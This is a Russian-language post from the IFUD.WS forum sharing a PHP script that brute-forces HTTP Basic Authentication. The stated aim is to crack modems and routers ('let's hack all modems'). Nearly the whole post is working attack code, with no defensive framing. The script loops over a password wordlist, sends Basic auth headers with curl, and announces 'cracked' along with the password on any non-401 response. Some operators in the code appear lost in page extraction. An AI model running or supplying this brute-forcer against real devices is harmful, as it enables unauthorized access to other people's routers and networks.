1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

PHP HTTP Basic Authentication Brute-force

Тема в разделе "Скрипты", создана пользователем ResH, 7 сен 2016.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    Небольшой скрипт для брута HTTP Basic Authentication , для примера модемов

    PHP:
    <?php
    error_reporting
    (0);
    ini_set('memory_limit''6000M');
    set_time_limit(0);


    /*

    HTTP AUTH брутер, паблик версия
    Взломаем все модемы xD
    /Psychopomp for IFUD


    Use:

    $ php -f brute.php

    ############################################################
    **************** HTTP AUTH брутер, паблик версия **************
    ********************* Мануал ********************
    php -f script.php username wordlist.txt http://192.168.1.1/
    ********************* Coded By Psychopomp for IFUD ********************
    ***********************************************************




    */

    $use=' php -f script.php username wordlist.txt http://192.168.1.1/';
    $ban=str_repeat('#',60) . PHP_EOL ' **************** HTTP AUTH брутер, паблик версия **************'  PHP_EOL .
    ' ********************* Мануал ********************'.
    PHP_EOL .$use PHP_EOL .
    ' ********************* Coded By Psychopomp for IFUD ********************'PHP_EOL .
    ' *********************************************************** ' .PHP_EOL ;



    $un=$argv[1];

    $wordlist=$argv[2];

    $ip=$argv[3];


    if(
    count($argv)!=4){ die(PHP_EOL $ban PHP_EOL);}

    echo 
    $ban;

    //print_r($argv);exit; 1
    $passm=file($wordlist) or die('Не могу открыть wordlist файл!' .PHP_EOL);




    foreach(
    $passm as $pass)
    {

    !isset(
    $za) ? $za=NULL '';$za++;


    $pass=trim((string)$pass);




    $ch curl_init();
    $curlConfig = array(
        
    CURLOPT_URL            => $ip,
        
    CURLOPT_POST           => false,
        
    CURLOPT_RETURNTRANSFER => true,
        
    CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
        
    curl_setopt($chCURLOPT_TIMEOUT12),
        
    curl_setopt($chCURLOPT_HTTPHEADER, array(
        
    'Authorization: Basic ' base64_encode($un.':'.$pass))));

    curl_setopt_array($ch$curlConfig);
    curl_exec($ch);

    $stat_code=curl_getinfo($chCURLINFO_HTTP_CODE);//200 SUCCESS.//
    echo 'HTTP STATUS CODE: ' $stat_code ' ';




    curl_close($ch);




    if(
    $stat_code!==401// success 200
    {
    echo 
    '[' $za .']' ' ' 'Взломан! ' htmlspecialchars((string)$un) . ' Пароль: ' htmlspecialchars((string)$pass).  PHP_EOL;
    exit;
    }
    else
    {
      echo 
    '[' .$za .']' ' ' 'Проверяется => ' htmlspecialchars((string)$un) . '  В качестве пароля: ' htmlspecialchars((string)$pass). PHP_EOL;
    }


    }

    unset(
    $pass);


    ?>
     
    Метки:

Поделиться этой страницей

Загрузка...